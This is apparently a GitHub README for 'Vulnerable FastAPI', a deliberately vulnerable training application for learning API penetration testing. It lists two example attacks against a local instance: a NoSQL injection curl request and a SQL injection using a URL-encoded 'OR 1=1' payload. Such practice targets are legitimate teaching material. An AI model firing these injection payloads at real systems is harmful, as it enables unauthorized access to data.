Skip to content

Latest commit

 

History

History
33 lines (25 loc) · 1016 Bytes

README.md

File metadata and controls

33 lines (25 loc) · 1016 Bytes
Raw

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.

Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks